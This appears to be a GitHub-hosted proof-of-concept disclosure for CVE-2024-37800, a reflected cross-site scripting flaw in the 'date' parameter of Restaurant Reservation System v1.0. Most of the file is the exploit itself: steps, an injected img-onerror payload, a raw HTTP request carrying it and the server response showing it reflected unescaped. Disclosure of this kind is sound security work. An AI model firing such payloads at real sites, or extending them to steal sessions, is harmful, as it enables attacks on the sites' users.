-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-37800
72 lines (65 loc) · 2.54 KB
/
CVE-2024-37800
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Exploit Title: Restaurant Reservation System v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-06-05
# Exploit Author: Sandeep Rajauriya
# Vendor Homepage: https://code-projects.org/restaurant-reservation-system-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/09/Restaurant_Reservation_System_In_PHP_With_Source_Code.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-37800
Description:Restaurant Reservation System v1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter.
POC
1) Go to index page in Restaurant Reservation System.
2) Check Open Time functionality
3) write your payload in "date=' parameter. Payload : "><img src=X onerror=prompt(345)></img>
2) After will you see prompt.
HTTP Request:
> POST /Restaurant/index.php HTTP/1.1
> Host: --REDACTED--
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate, br
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 70
> Origin: http://--REDACTED--
> Connection: close
> Referer: http://--REDACTED--/Restaurant/index.php
> Cookie: PHPSESSID=g0b9grvms17eaafu2e4gmolp17
> Upgrade-Insecure-Requests: 1
> Priority: u=1
>date=2024-06-05"><img src=X onerror=prompt(345)></img>&check_schedule=
HTTP Response:
> HTTP/1.1 200 OK
> Date: Wed, 05 Jun 2024 14:15:38 GMT
> Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
> X-Powered-By: PHP/8.2.12
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: no-store, no-cache, must-revalidate
> Pragma: no-cache
> Connection: close
> Content-Type: text/html; charset=UTF-8
> Content-Length: 14584
>
<!DOCTYPE html>
--REDACTED--
> <html lang="en">
> <head>
<table class='table table-striped table-dark text-center'>
<thead>
<tr>
<th scope='col'>Date</th>
<th scope='col'>Open Time</th>
<th scope='col'>Close Time</th>
</tr>
</thead>
<tbody>
<tr>
<th scope='row'><em>2024-06-14"><img src=X onerror=prompt(345)></img></em></th>
<td>12:00</td>
<td>00:00</td>
</tr>
</tbody>
</table>
</div><br>
</div>
--REDACTED--